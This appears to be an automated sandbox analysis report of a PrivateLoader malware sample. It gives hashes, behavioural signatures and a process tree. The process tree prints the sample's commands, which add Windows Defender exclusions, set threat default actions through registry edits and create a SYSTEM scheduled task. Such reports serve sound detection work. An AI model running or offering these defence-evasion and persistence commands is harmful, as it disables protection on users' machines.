Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-05-2024 09:34

General

  • Target

    fc44a0e8161907e73f2e7f0ee5b264a8e2c78f5af3437c4cb25341661da8d813.exe

  • Size

    1.8MB

  • MD5

    7ff8c26a36f5a4566990745dff1594f3

  • SHA1

    5d73bbd168fb9b1e43051340a415d95f28c40f4d

  • SHA256

    fc44a0e8161907e73f2e7f0ee5b264a8e2c78f5af3437c4cb25341661da8d813

  • SHA512

    d97be45d80e85722e74b44aeff834b2ccc219520c7d1632452c4a361b9dea59439f0f0ba27af6444132147c7bc30ccd5582bb0a0e246baf00f61e16195706b2d

  • SSDEEP

    24576:jynjN3fi9dEoZR814OEQjls30eTFxmT4i8eMOq52eOXuq01dKqOF7:ujN3CdJ81nEQhs30eWuqsrOF7

Malware Config

Signatures

  • Modifies firewall policy service 2 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 5 IoCs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 7 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 35 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fc44a0e8161907e73f2e7f0ee5b264a8e2c78f5af3437c4cb25341661da8d813.exe
    "C:\Users\Admin\AppData\Local\Temp\fc44a0e8161907e73f2e7f0ee5b264a8e2c78f5af3437c4cb25341661da8d813.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4716
    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1068
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
      2⤵
      • Drops startup file
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1108
      • C:\Users\Admin\Pictures\5E4UOFPpcsyTvtSjxxE8ornR.exe
        "C:\Users\Admin\Pictures\5E4UOFPpcsyTvtSjxxE8ornR.exe" /s
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Writes to the Master Boot Record (MBR)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1540
      • C:\Users\Admin\Pictures\z3SMMh2XirGULjgTpREzk5Bg.exe
        "C:\Users\Admin\Pictures\z3SMMh2XirGULjgTpREzk5Bg.exe"
        3⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        PID:2644
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 352
          4⤵
          • Program crash
          PID:4092
      • C:\Users\Admin\Pictures\QLEQchdtJjX8eCeYE3PHNh39.exe
        "C:\Users\Admin\Pictures\QLEQchdtJjX8eCeYE3PHNh39.exe"
        3⤵
        • Modifies firewall policy service
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Checks whether UAC is enabled
        • Drops file in System32 directory
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        PID:1980
      • C:\Users\Admin\Pictures\c5zoOemcSHwRSTLum7QIwHi8.exe
        "C:\Users\Admin\Pictures\c5zoOemcSHwRSTLum7QIwHi8.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:868
        • C:\Users\Admin\AppData\Local\Temp\7zSC3DC.tmp\Install.exe
          .\Install.exe /odidum "385118" /S
          4⤵
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Enumerates system info in registry
          • Suspicious use of WriteProcessMemory
          PID:1940
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2612
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4000
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:952
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  8⤵
                    PID:3368
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1976
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4432
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                    8⤵
                      PID:4608
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4652
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1204
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                      8⤵
                        PID:1052
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4568
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                      7⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4472
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                        8⤵
                          PID:956
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                      6⤵
                        PID:376
                        • C:\Windows\SysWOW64\cmd.exe
                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                          7⤵
                            PID:3164
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                              8⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2916
                              • C:\Windows\SysWOW64\gpupdate.exe
                                "C:\Windows\system32\gpupdate.exe" /force
                                9⤵
                                  PID:3408
                        • C:\Windows\SysWOW64\forfiles.exe
                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                          5⤵
                            PID:3296
                            • C:\Windows\SysWOW64\cmd.exe
                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                              6⤵
                                PID:4228
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                  7⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1640
                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                    8⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1504
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 09:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSC3DC.tmp\Install.exe\" it /bXkdidQqza 385118 /S" /V1 /F
                              5⤵
                              • Drops file in Windows directory
                              • Creates scheduled task(s)
                              PID:464
                            • C:\Windows\SysWOW64\forfiles.exe
                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                              5⤵
                                PID:4384
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                  6⤵
                                    PID:4568
                                    • \??\c:\windows\SysWOW64\schtasks.exe
                                      schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                      7⤵
                                        PID:1116
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2644 -ip 2644
                            1⤵
                              PID:4416
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                              1⤵
                                PID:4596
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                1⤵
                                  PID:3252
                                • C:\Users\Admin\AppData\Local\Temp\7zSC3DC.tmp\Install.exe
                                  C:\Users\Admin\AppData\Local\Temp\7zSC3DC.tmp\Install.exe it /bXkdidQqza 385118 /S
                                  1⤵
                                  • Executes dropped EXE
                                  • Drops desktop.ini file(s)
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  PID:2728
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                    2⤵
                                      PID:3656
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                        3⤵
                                          PID:4916
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                            4⤵
                                              PID:3324
                                              • \??\c:\windows\SysWOW64\reg.exe
                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                5⤵
                                                  PID:4872
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                              3⤵
                                                PID:1276
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                  4⤵
                                                    PID:2012
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                      5⤵
                                                        PID:4152
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                    3⤵
                                                      PID:4944
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                        4⤵
                                                          PID:376
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                            5⤵
                                                              PID:2624
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                          3⤵
                                                            PID:4300
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                              4⤵
                                                                PID:1120
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                  5⤵
                                                                    PID:468
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                3⤵
                                                                  PID:3048
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                    4⤵
                                                                      PID:3940
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                        5⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Drops file in System32 directory
                                                                        • Modifies data under HKEY_USERS
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2400
                                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                          6⤵
                                                                            PID:3980
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                    2⤵
                                                                    • Drops file in System32 directory
                                                                    • Modifies data under HKEY_USERS
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1052
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                      3⤵
                                                                        PID:3164
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                          4⤵
                                                                            PID:1672
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:4944
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                            3⤵
                                                                              PID:468
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                              3⤵
                                                                                PID:1120
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                3⤵
                                                                                  PID:4300
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                  3⤵
                                                                                    PID:952
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                    3⤵
                                                                                      PID:1372
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                      3⤵
                                                                                        PID:1612
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                        3⤵
                                                                                          PID:5044
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                          3⤵
                                                                                            PID:3644
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                            3⤵
                                                                                              PID:4092
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                              3⤵
                                                                                                PID:4244
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                3⤵
                                                                                                  PID:4756
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                  3⤵
                                                                                                    PID:3776
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                    3⤵
                                                                                                      PID:3048
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                      3⤵
                                                                                                        PID:3744
